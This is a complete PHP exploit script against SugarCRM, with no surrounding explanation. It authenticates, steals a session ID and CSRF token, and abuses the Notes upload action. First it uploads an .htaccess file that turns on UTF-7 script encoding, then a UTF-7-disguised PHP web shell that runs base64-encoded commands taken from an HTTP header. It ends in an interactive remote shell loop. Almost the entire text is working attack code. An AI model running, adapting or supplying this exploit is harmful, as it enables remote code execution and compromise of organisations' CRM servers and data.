<?php

set_time_limit(0);
error_reporting(E_ERROR);

if (!extension_loaded("curl")) die("[+] cURL extension required!\n");

if ($argc != 4) die("Usage: php $argv[0] <URL> <username> <password>\n");

list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]];

print "[+] Logging in with username '{$user}' and password '{$pass}'\n";

$ch = curl_init();

$params = ["username" => $user, "password" => $pass, "grant_type" => "password", "client_id" => "sugar"];

curl_setopt($ch, CURLOPT_URL, "{$url}rest/v10/oauth2/token");
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($params));
curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json"]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

if (($token = (json_decode(curl_exec($ch)))->access_token) == null) die("[+] Login failed!\n");

print "[+] Retrieving PHPSESSID and CSRF token\n";

curl_setopt($ch, CURLOPT_URL, "{$url}rest/v10/oauth2/bwc/login");
curl_setopt($ch, CURLOPT_HTTPHEADER, ["OAuth-Token: {$token}"]);
curl_setopt($ch, CURLOPT_POSTFIELDS, "");
curl_setopt($ch, CURLOPT_HEADER, true);

if (!preg_match("/PHPSESSID=([^;]+);/", curl_exec($ch), $sid)) die("[+] Session ID not found!\n");

curl_setopt($ch, CURLOPT_URL, "{$url}index.php?module=Notes&action=index");
curl_setopt($ch, CURLOPT_POST, false);
curl_setopt($ch, CURLOPT_HTTPHEADER, ["Cookie: PHPSESSID={$sid[1]}", "Referer: {$url}", "Content-Type: multipart/form-data; boundary=o0oOo0o"]);

if (!preg_match('/form_token = "([^"]+)"/', curl_exec($ch), $csrf)) die("[+] CSRF token not found!\n");

print "[+] Uploading .htaccess file\n";

$payload  = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"csrf_token\";\r\n\r\n";
$payload .= "{$csrf[1]}\r\n";
$payload .= "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"id\";\r\n\r\n";
$payload .= ".htaccess\r\n--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"uploadfile\"; filename=\"rce\"\r\n\r\n";
$payload .= "RewriteEngine on\nRewriteBase /upload\nRewriteRule ^(.*)$ - [L]\nphp_flag zend.multibyte 1\nphp_value zend.script_encoding \"UTF-7\"";
$payload .= "\r\n--o0oOo0o\r\n";

curl_setopt($ch, CURLOPT_URL, "{$url}index.php?module=Notes&action=save");
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);

if (!preg_match("/200 OK/", curl_exec($ch))) die("[+] Upload failed!\n");

print "[+] Uploading PHP shell\n";

$payload  = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"csrf_token\";\r\n\r\n";
$payload .= "{$csrf[1]}\r\n";
$payload .= "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"id\";\r\n\r\n";
$payload .= "sh.php\r\n--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"uploadfile\"; filename=\"rce\"\r\n\r\n";
$payload .= "+ADw?php print(____); passthru(base64_decode(\$_SERVER[HTTP_CMD]));";
$payload .= "\r\n--o0oOo0o\r\n";

curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);

if (!preg_match("/200 OK/", curl_exec($ch))) die("[+] Upload failed!\n");

print "[+] Launching shell\n";

curl_setopt($ch, CURLOPT_URL, "{$url}upload/sh.php");
curl_setopt($ch, CURLOPT_POST, false);

while(1)
{
    print "\nsugar-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".base64_encode($cmd)]);
    preg_match("/____(.*)/s", curl_exec($ch), $m) ? print $m[1] : die("\n[+] Exploit failed!\n");
}